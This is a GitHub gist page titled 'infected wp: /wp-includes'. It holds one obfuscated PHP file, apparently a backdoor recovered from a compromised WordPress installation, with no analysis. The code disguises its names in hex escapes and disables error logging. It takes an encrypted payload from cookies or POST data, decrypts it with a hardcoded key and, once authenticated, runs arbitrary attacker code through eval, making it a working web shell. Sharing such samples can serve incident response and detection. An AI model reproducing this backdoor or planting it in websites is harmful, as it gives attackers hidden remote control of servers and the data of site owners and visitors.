Create a gist now

Instantly share code, notes, and snippets.

@nikitasius /wp-obf.php Secret
Created Feb 16, 2017

What would you like to do?
infected wp: /wp-includes
<?php ${"\x47L\x4f\x42\x41L\x53"}["\x62u\x6d\x66\x7a\x78"]="a\x75\x74h";${"\x47LOBAL\x53"}["\x71\x70b\x78\x67\x70\x69\x65\x71b\x78"]="\x76\x61\x6c\x75\x65";${"GLO\x42\x41\x4c\x53"}["e\x6e\x79p\x75\x74\x68d\x6c\x6bk"]="k\x65\x79";${"\x47L\x4fBA\x4c\x53"}["\x70\x77\x68ueh\x75i"]="\x6a";${"\x47L\x4f\x42\x41L\x53"}["\x70\x62k\x71\x70wke\x75\x74\x68u"]="\x69";${"G\x4c\x4f\x42\x41L\x53"}["\x74\x6b\x6f\x71\x6ac\x77b\x63\x6a"]="v\x61\x6cu\x65";$udborfbq="data";${"G\x4c\x4f\x42AL\x53"}["\x62\x64\x79l\x70n\x77g\x77\x75y\x6e"]="\x64\x61\x74\x61\x5f\x6b\x65\x79";${"G\x4cO\x42\x41L\x53"}["knx\x74\x77\x69h\x6d\x75\x67i"]="\x64a\x74\x61";@ini_set("e\x72r\x6fr\x5flog",NULL);@ini_set("\x6cog\x5f\x65\x72ro\x72s",0);$bgvvfcvmjs="\x64\x61\x74a";@ini_set("m\x61\x78\x5fe\x78e\x63u\x74io\x6e_t\x69\x6d\x65",0);@set_time_limit(0);if(!defined("PHP\x5fE\x4f\x4c")){define("PHP\x5f\x45O\x4c","\n");}if(!defined("\x44I\x52\x45\x43\x54ORY_S\x45P\x41RA\x54\x4fR")){define("\x44I\x52E\x43T\x4f\x52Y_SE\x50\x41R\x41\x54O\x52","/");}$wnmcyzak="d\x61\x74\x61";${${"\x47LO\x42\x41\x4c\x53"}["\x6b\x6e\x78\x74\x77\x69hm\x75\x67i"]}=NULL;${${"\x47L\x4fBA\x4c\x53"}["bd\x79\x6c\x70\x6ew\x67w\x75\x79\x6e"]}=NULL;${"G\x4c\x4f\x42\x41LS"}["z\x74\x6bd\x7am\x76\x76\x79\x68"]="\x64ata";$GLOBALS["\x61\x75\x74h"]="\x34\x65f63\x61\x62\x65-1a\x62d-\x34\x35\x616-91\x33d-\x36fb\x39\x39\x36\x35\x37\x65\x32\x34b";global$auth;function sh_decrypt_phase($data,$key){${"\x47\x4cOB\x41L\x53"}["g\x79\x6ejj\x6d\x6e\x67"]="\x6fu\x74\x5f\x64a\x74a";$oqghebfm="\x6fut\x5fd\x61\x74\x61";${${"\x47\x4cO\x42\x41\x4c\x53"}["\x67yn\x6aj\x6dn\x67"]}="";for(${${"G\x4c\x4f\x42A\x4c\x53"}["\x70\x62k\x71\x70\x77k\x65u\x74hu"]}=0;${${"G\x4cO\x42\x41\x4cS"}["\x70\x62k\x71\x70wke\x75\x74\x68\x75"]}<strlen(${${"\x47\x4cO\x42\x41L\x53"}["knx\x74\x77\x69\x68\x6d\x75g\x69"]});){${"\x47\x4c\x4f\x42ALS"}["\x75\x6d\x6el\x73a\x64w"]="\x69";$lkkuocmcoky="j";${"\x47L\x4f\x42\x41\x4c\x53"}["\x6d\x76\x6b\x6ehi\x71\x6c"]="\x64a\x74a";${"\x47\x4cO\x42\x41\x4cS"}["\x6e\x66\x74\x63p\x6e\x66d\x75\x64\x6fm"]="j";for(${${"\x47\x4c\x4fB\x41\x4c\x53"}["n\x66tcpn\x66\x64u\x64\x6fm"]}=0;${${"G\x4cO\x42A\x4cS"}["\x70\x77\x68\x75\x65\x68u\x69"]}<strlen(${${"GL\x4fBA\x4c\x53"}["\x65\x6e\x79\x70u\x74\x68\x64\x6c\x6b\x6b"]})&&${${"\x47LO\x42\x41\x4cS"}["u\x6d\x6e\x6c\x73\x61\x64\x77"]}<strlen(${${"\x47\x4cO\x42AL\x53"}["\x6dv\x6bn\x68\x69\x71\x6c"]});${$lkkuocmcoky}++,${${"\x47LOBAL\x53"}["\x70\x62kqp\x77\x6beu\x74\x68u"]}++){${"G\x4cOB\x41L\x53"}["nv\x6e\x6f\x6ab\x77\x6e\x66\x76"]="\x69";$lworesibofc="\x6fu\x74\x5f\x64a\x74a";${$lworesibofc}.=chr(ord(${${"\x47\x4c\x4fB\x41\x4cS"}["\x6bnxt\x77i\x68mug\x69"]}[${${"\x47\x4c\x4f\x42ALS"}["\x6ev\x6e\x6fjb\x77\x6e\x66v"]}])^ord(${${"\x47L\x4f\x42\x41LS"}["e\x6e\x79\x70u\x74\x68d\x6ck\x6b"]}[${${"GL\x4fB\x41L\x53"}["p\x77\x68\x75\x65\x68\x75\x69"]}]));}}return${$oqghebfm};}function sh_decrypt($data,$key){$imcerufeozd="\x64\x61t\x61";${"GL\x4f\x42A\x4c\x53"}["\x71q\x77\x6e\x6b\x71\x69"]="\x6be\x79";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x66\x6c\x6egk\x66w"]="a\x75th";global$auth;return sh_decrypt_phase(sh_decrypt_phase(${$imcerufeozd},${${"\x47L\x4f\x42AL\x53"}["\x6b\x66l\x6eg\x6b\x66\x77"]}),${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["q\x71\x77\x6e\x6b\x71i"]});}foreach($_COOKIE as${${"\x47L\x4f\x42A\x4c\x53"}["e\x6e\x79\x70\x75\x74\x68\x64l\x6b\x6b"]}=>${${"\x47\x4cO\x42\x41LS"}["\x74\x6b\x6fqj\x63\x77\x62\x63\x6a"]}){${"GLO\x42\x41L\x53"}["\x6ain\x72o\x73\x75\x72\x65"]="va\x6cue";$xgonept="\x64\x61ta_\x6b\x65\x79";${"G\x4c\x4f\x42\x41\x4cS"}["\x6b\x6f\x61l\x62\x6c\x79j"]="k\x65y";${${"G\x4cO\x42\x41\x4c\x53"}["\x6b\x6e\x78\x74wi\x68\x6d\x75g\x69"]}=${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6a\x69\x6eros\x75r\x65"]};${$xgonept}=${${"\x47L\x4f\x42\x41\x4c\x53"}["k\x6f\x61\x6cb\x6cyj"]};}${"G\x4c\x4f\x42\x41\x4cS"}["\x6ebk\x66qy\x79\x6c"]="\x64\x61\x74\x61_key";$orxjiexskq="\x64\x61\x74\x61";if(!${${"\x47L\x4f\x42\x41\x4cS"}["\x7at\x6b\x64\x7a\x6dv\x76\x79\x68"]}){${"GL\x4f\x42\x41\x4c\x53"}["\x77\x71\x67\x63b\x6c"]="key";foreach($_POST as${${"GL\x4f\x42\x41LS"}["w\x71\x67\x63\x62\x6c"]}=>${${"G\x4c\x4f\x42\x41\x4c\x53"}["q\x70\x62\x78gpi\x65q\x62x"]}){${"G\x4cO\x42\x41\x4c\x53"}["\x73h\x70\x76lb"]="\x64\x61\x74a";$rsbfutrj="\x6b\x65y";${${"G\x4c\x4fB\x41L\x53"}["\x73h\x70\x76\x6c\x62"]}=${${"G\x4cO\x42\x41\x4c\x53"}["q\x70\x62xg\x70\x69eq\x62x"]};${${"\x47\x4cOBAL\x53"}["\x62\x64\x79l\x70\x6e\x77\x67w\x75\x79\x6e"]}=${$rsbfutrj};}}${$orxjiexskq}=@unserialize(sh_decrypt(@base64_decode(${$udborfbq}),${${"\x47\x4c\x4fB\x41\x4cS"}["nbkf\x71\x79\x79\x6c"]}));if(isset(${$wnmcyzak}["\x61\x6b"])&&${${"\x47\x4c\x4fB\x41\x4c\x53"}["b\x75m\x66\x7ax"]}==${$bgvvfcvmjs}["\x61k"]){${"\x47\x4cOBAL\x53"}["\x74\x78\x79\x65\x6f\x78\x74\x78\x73\x71"]="\x64at\x61";${"\x47\x4c\x4fB\x41\x4cS"}["\x65\x63\x65l\x69\x65\x6bt"]="d\x61\x74\x61";if(${${"\x47L\x4f\x42A\x4cS"}["\x74\x78\x79\x65\x6f\x78tx\x73\x71"]}["\x61"]=="\x69"){$mrngyyp="i";${${"G\x4c\x4fB\x41\x4c\x53"}["\x70\x62\x6bq\x70wk\x65\x75thu"]}=Array("pv"=>@phpversion(),"\x73\x76"=>"\x31.\x30-1",);echo@serialize(${$mrngyyp});}elseif(${${"\x47L\x4f\x42\x41L\x53"}["\x65c\x65\x6c\x69\x65\x6bt"]}["a"]=="\x65"){eval(${${"G\x4c\x4f\x42\x41\x4c\x53"}["kn\x78t\x77ihm\x75g\x69"]}["\x64"]);}}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment